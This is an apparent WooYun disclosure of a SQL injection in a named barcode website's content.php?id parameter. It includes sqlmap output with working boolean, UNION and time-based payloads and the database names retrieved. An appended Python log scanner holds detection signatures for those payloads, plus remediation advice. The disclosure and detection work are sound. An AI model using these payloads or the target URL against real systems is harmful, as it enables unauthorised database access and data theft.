WooYun (WooYun.org) historical vulnerability search --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-02-04: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed to the public.
2015-03-21: The vendor has actively ignored the vulnerability; details are disclosed to the public.
A SQL injection exists in one location, and database information can be obtained directly through it!
Injection URL: http://www.barcodebm.com/content.php?id=213

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 34 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=213 AND 1630=1630

    Type: UNION query
    Title: MySQL UNION query (NULL) - 12 columns
    Payload: id=-3889 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x3a6771753a,0x74646b564d4344535462,0x3a6a70693a),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=213 AND SLEEP(5)
---
[19:34:12] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.17
back-end DBMS: MySQL 5.0.11
[19:34:12] [INFO] fetching database names
[19:34:12] [INFO] the SQL query used returns 2 entries
[19:34:13] [INFO] retrieved: "information_schema"
[19:34:14] [INFO] retrieved: "bangma"
available databases [2]:
[*] bangma
[*] information_schema
[19:34:14] [WARNING] cannot properly display Unicode characters inside Windows OS command prompt (http://bugs.python.org/issue1602). All unhandled occurances will result in replacement with '?' character. Please, find proper character representation inside corresponding output files.
[19:34:14] [INFO] fetched data logged to text files under 'Z:\Hacker Tools\????\????\sqlmap\output\www.barcodebm.com'
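From the detection side, as an added example that is not part of the original report: the script below scans web-server access-log lines for the three payload shapes sqlmap reported against the numeric id parameter of content.php (boolean-based AND n=n, UNION ... SELECT, and time-based SLEEP()), and flags any id value that is not a plain integer. The log lines, timestamps and client address are constructed; only the content.php?id parameter comes from the report.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log sample (not from the report). The id values mirror the
# three injection classes sqlmap listed; the last line is a clean request.
SAMPLE_LOG = """\
203.0.113.7 - - [04/Feb/2015:19:34:10 +0800] "GET /content.php?id=213 HTTP/1.1" 200 5120
203.0.113.7 - - [04/Feb/2015:19:34:11 +0800] "GET /content.php?id=213%20AND%201630%3D1630 HTTP/1.1" 200 5120
203.0.113.7 - - [04/Feb/2015:19:34:12 +0800] "GET /content.php?id=-3889%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT(0x3a6771753a)%23 HTTP/1.1" 200 5301
203.0.113.7 - - [04/Feb/2015:19:34:13 +0800] "GET /content.php?id=213%20AND%20SLEEP(5) HTTP/1.1" 200 5120
203.0.113.7 - - [04/Feb/2015:19:34:14 +0800] "GET /about.php HTTP/1.1" 200 2048
"""

# Combined-log-format request line: timestamp, method and request target.
LOG_RE = re.compile(r'\[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) ')

# Signatures for the injection classes in the sqlmap output (checked in order).
SIGNATURES = [
    ("union", re.compile(r"\bUNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("time-based", re.compile(r"\b(?:SLEEP|BENCHMARK)\s*\(", re.I)),
    ("boolean-based", re.compile(r"\b(?:AND|OR)\s+\d+\s*=\s*\d+\b", re.I)),
]
INT_RE = re.compile(r"^-?\d+$")


def classify_id(value):
    """Return the injection class of an id value, 'non-numeric' if it only
    fails the integer check, or None for a clean integer id."""
    if INT_RE.match(value):
        return None
    for label, pattern in SIGNATURES:
        if pattern.search(value):
            return label
    return "non-numeric"


def scan_log(text, param="id"):
    """Yield (timestamp, class, decoded value) for every suspicious id value."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.search(line)
        if not m:
            continue
        # parse_qs percent-decodes, so %20/%3D/%23 become the raw payload text.
        qs = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        for value in qs.get(param, []):
            label = classify_id(value)
            if label:
                findings.append((m.group("ts"), label, value))
    return findings


if __name__ == "__main__":
    for ts, label, value in scan_log(SAMPLE_LOG):
        print(f"{ts}  {label:14}  id={value!r}")
```

The same integer check (`INT_RE`) applied server-side before the value reaches the query, or a prepared statement with the id bound as an integer, is what removes the bug itself; the log scan only tells you it was probed.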
The vendor could not be contacted, or the vendor actively declined.